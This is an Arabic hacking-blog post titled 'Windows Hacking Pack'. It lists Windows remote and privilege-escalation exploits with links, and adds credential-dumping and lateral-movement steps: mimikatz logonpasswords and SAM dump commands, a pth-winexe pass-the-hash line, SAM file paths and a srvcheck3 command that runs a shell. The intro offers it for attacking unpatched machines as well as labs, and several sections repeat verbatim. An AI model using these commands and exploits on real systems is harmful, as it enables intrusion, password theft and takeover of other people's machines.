مجموعة ثغرات اختراق ويندوز Windows Hacking Pack – WHP - كورتكس هكر مجموعة ثغرات اختراق ويندوز Windows Hacking Pack – WHP | كورتكس هكر
اكتب ما تود البحت عنه و اضغط Enter
معذرة، فالصفحة التي تبحث عنها في هذه المدونة ليست متوفرة.

19 سبتمبر، 2018

مجموعة ثغرات اختراق ويندوز Windows Hacking Pack – WHP

اقرأ أيضا


مجموعة ثغرات اختراق ويندوز Windows Hacking Pack – WHP

بعد البحث الطويل وجدت هذه المجموعة من الثغرات الخاصة باختراق انظمة مايكروسوفت المختلفة
منها ما يقوم باختراق النظام وهناك ثغرات خاصة بالحصول على صلاحيات الادمين بعد الاختراق
وهناك من تقوم بعمل دامب وحفظ كلمات المرور الخاصة بالضحية . الثغرات مرقعة ولكن يمكن استعمالها على الاجهزة التي لا تقوم بالتحديث أو يمكن استخدامها على مختبر الاختراق الخاص بك .

الثغرات مع رابط الموقع

Remote Exploits For Windows Hacking Pack
=========================================
Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp

Windows XP/NT (beofre SP2)
MS03-026  Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit

Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv)
https://www.exploit-db.com/exploits/7104/

Windows Windows 7 and Server 2008 R2 (x64) All Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010

Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8
Privilege Escalation
======================
First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
================
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=============
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/

Other ways of exploits listed
==============================
Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE: 2010-4398  Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/

Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM
Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service

Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE: 2010-4398  Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/

Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/

Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.
https://www.youtube.com/watch?v=cuF_Ibo-mmM

Backup files if contain sam
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM
Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel
Otherwise just copy.

Dump SAM through shadow volume
If it can be created the database could be copied from this.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow

Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/

LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip

PassTheHash (before Windows 8.1)
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd

PassTheTicket (Kerberos)
mimikatz can do it

Duplicate Access Tokens (if admin access token can be used, it's win)
http://sourceforge.net/projects/incognito/

Token "Kidnapping"
MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html

Other notablelo tools
psexec, smbshell, metasploit’s psexec, etc
https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.


To Be Added
==============
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade

شارك الموضوع عبر :

كاتب الموضوع :

ليست هناك تعليقات:

إرسال تعليق

كورتكس هكر: شروحات اللينكس واختبار الاختراق والحماية | CortexHacker
كورتكس هكر هي مدونة تهتم بطرح مواضيع اختبار الاختراق وأمن المعلومات, وطرق اكتشاف الثغرات بالبرامج والمواقع و كيفية الحماية منها, وطرق التخفي وأسرار الديب ويب وكل ما يخص الاختراق الأخلاقي
جميع الحقوق محفوظة ل كورتكس هكر
صمم وكود بكل من طرف